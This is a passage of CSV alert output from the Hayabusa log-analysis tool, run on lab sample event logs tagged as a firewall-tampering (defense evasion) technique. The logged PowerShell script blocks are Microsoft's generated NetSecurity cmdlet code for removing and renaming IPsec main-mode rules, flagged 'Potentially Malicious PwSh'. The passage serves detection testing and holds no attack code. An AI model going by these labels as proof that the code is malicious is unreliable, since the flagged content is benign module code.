${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } 
else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', 
